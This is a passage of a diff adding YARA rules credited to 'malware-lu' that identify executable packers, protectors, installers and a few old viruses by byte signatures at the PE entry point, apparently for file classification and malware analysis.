+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VirogensPEShrinkerv014
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 E8 ?? ?? ?? ?? 87 D5 5D 60 87 D5 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 57 56 AD 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }
+	$a1 = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }
+	$a2 = { EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ACProtect109Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 02 00 00 90 90 90 04 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorV16dVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv032BetaPatchDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 50 ?? AD 91 F3 A5 }
+
+condition:
+		$a0
+}
+	
+	
+rule Apex30alpha500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5F B9 14 00 00 00 51 BE 00 10 40 00 B9 00 ?? ?? 00 8A 07 30 06 46 E2 FB 47 59 E2 EA 68 ?? ?? ?? 00 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimbiOZPoly21Extranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 50 8B C4 83 C0 04 C7 00 ?? ?? ?? ?? 58 C3 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov183
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov182
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov180
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter13SplitMethodBillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED 08 12 40 00 E8 66 FE FF FF 55 50 8D 9D 81 11 40 00 53 8D 9D 21 11 40 00 53 6A 08 E8 76 FF FF FF 6A 40 68 00 30 00 00 68 00 01 00 00 6A 00 FF 95 89 11 40 00 89 85 61 10 40 00 50 68 00 01 00 00 FF 95 85 11 40 00 8D 85 65 10 40 00 50 FF B5 61 10 40 00 FF 95 8D 11 40 00 6A 00 68 80 00 00 00 6A 02 6A 00 ?? ?? ?? ?? 01 1F 00 FF B5 61 10 40 00 FF 95 91 11 40 00 89 85 72 10 40 00 6A 00 8D ?? ?? ?? ?? 00 50 FF B5 09 10 40 00 8D 85 F5 12 40 00 50 FF B5 72 10 40 00 FF 95 95 11 40 00 FF B5 72 10 40 00 FF 95 99 11 40 00 8D 85 0D 10 40 00 50 8D 85 1D 10 40 00 50 B9 07 00 00 00 6A 00 E2 FC }
+	$a1 = { E9 FE 01 00 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 76 63 45 72 30 31 31 2E 74 6D 70 00 00 00 00 00 00 00 00 00 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 85 C0 0F 84 5F 02 00 00 8B 48 30 80 39 6B 74 07 80 39 4B 74 02 EB E7 80 79 0C 33 74 02 EB DF 8B 40 18 C3 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule RJoiner12aVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 01 00 00 8D 85 F4 FE FF FF 56 50 68 04 01 00 00 FF 15 0C 10 40 00 94 90 94 8D 85 F4 FE FF FF 50 FF 15 08 10 40 00 94 90 94 BE 00 20 40 00 94 90 94 83 3E FF 74 7D 53 57 33 DB 8D 7E 04 94 90 94 53 68 80 00 00 00 6A 02 53 6A 01 68 00 00 00 C0 57 FF 15 04 10 40 00 89 45 F8 94 90 94 8B 06 8D 74 06 04 94 90 94 8D 45 FC 53 50 8D 46 04 FF 36 50 FF 75 F8 FF 15 00 10 40 00 94 90 94 FF 75 F8 FF 15 10 10 40 00 94 90 94 8D 85 F4 FE FF FF 6A 0A 50 53 57 68 20 10 40 00 53 FF 15 18 10 40 00 94 90 94 8B 06 8D 74 06 04 94 90 94 83 3E FF 75 89 5F 5B 33 C0 5E C9 C2 10 00 CC CC 24 11 }
+
+condition:
+		$a0
+}
+	
+	
+rule VxVirusConstructorIVPbased
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? E8 ?? ?? 5D ?? ?? ?? ?? ?? 81 ED ?? ?? ?? ?? ?? ?? E8 ?? ?? 81 FC ?? ?? ?? ?? 8D ?? ?? ?? BF ?? ?? 57 A4 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE12003518WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv168v184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 7B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorProEdition116RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 }
+	$a1 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 18 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 93 03 00 00 03 C8 74 C4 75 C2 E8 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Reg2Exe222223byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 2F 1E 00 00 A3 C4 35 40 00 E8 2B 1E 00 00 6A 0A 50 6A 00 FF 35 C4 35 40 00 E8 07 00 00 00 50 E8 1B 1E 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 C8 35 40 00 E8 76 16 00 00 83 C4 0C 8B 44 24 04 A3 CC 35 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 EC 1D 00 00 A3 C8 35 40 00 E8 62 1D 00 00 E8 92 1A 00 00 E8 80 16 00 00 E8 13 14 00 00 68 01 00 00 00 68 08 36 40 00 68 00 00 00 00 8B 15 08 36 40 00 E8 71 3F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 3F 00 00 FF 35 48 31 40 00 B8 00 01 00 00 E8 0D 13 00 00 8D 0D EC 35 40 00 5A E8 F2 13 00 00 68 00 01 00 00 FF 35 EC 35 40 00 E8 84 1D 00 00 A3 F4 35 40 00 FF 35 48 31 40 00 FF 35 F4 35 40 00 FF 35 EC 35 40 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandDelphiMicrosoftVisualC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CICompressv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv27b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXInlinerv10byGPcH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule PKLITEv114v120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeToolsCOM2EXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ED ?? 8C DA 2E 89 96 ?? ?? 83 C2 ?? 8E DA 8E C2 2E 01 96 ?? ?? 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2545Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F2 FF FF FF 50 68 ?? ?? ?? ?? 68 40 1B 00 00 E8 42 FF FF FF E9 9D FF FF FF 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxARCV4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5D 81 ED 06 01 81 FC 4F 50 74 0B 8D B6 86 01 BF 00 01 57 A4 EB 11 1E 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo3X5XSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 60 33 C9 75 02 EB 15 EB 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePESHiELD025emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov252beta2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CipherWallSelfExtratorDecryptorConsolev15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv029
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV33LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CopyMinderMicrocosmLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 25 ?? ?? ?? ?? EF 6A 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Crunchv5BitArts
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkerv020
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo500SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E3 40 00 00 E9 16 FE FF FF 6A 0C 68 ?? ?? ?? ?? E8 44 15 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 36 13 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 C7 12 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 48 11 00 00 59 89 7D FC FF 75 08 E8 01 49 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 66 D3 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 AF F9 FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 EE 0F 00 00 59 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtector060SLVICU
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD }
+
+condition:
+		$a0
+}
+	
+	
+rule Kryptonv03
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrackStopv101cStefanEsser1997
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 48 BB FF FF B9 EB 27 8B EC CD 21 FA FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Kryptonv05
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Kryptonv04
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PassLock2000v10EngMoonlightSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv029Betav031BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 }
+
+condition:
+		$a0
+}
+	
+	
+rule AlexProtector10beta2byAlex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B 44 24 0C EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 83 80 B8 00 00 00 02 33 C0 EB 01 E9 C3 58 83 C4 04 EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 50 64 FF 35 00 00 00 00 64 89 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule MoleBoxv254Teggo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 8B 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 24 61 58 58 FF D0 E8 ?? ?? 00 00 6A 00 FF 15 ?? ?? ?? 00 CC CC CC CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule InstallShield2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1337ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv03Engcyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 }
+	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PEPack099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVCL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AC B9 00 80 F2 AE B9 04 00 AC AE 75 ?? E2 FA 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VterminalV10XLeiPeng
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 05 ?? ?? ?? ?? 9C 50 C2 04 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEEncrypt10Liwuyue
+{
+      meta:
+		author="malware-lu"
+strings:
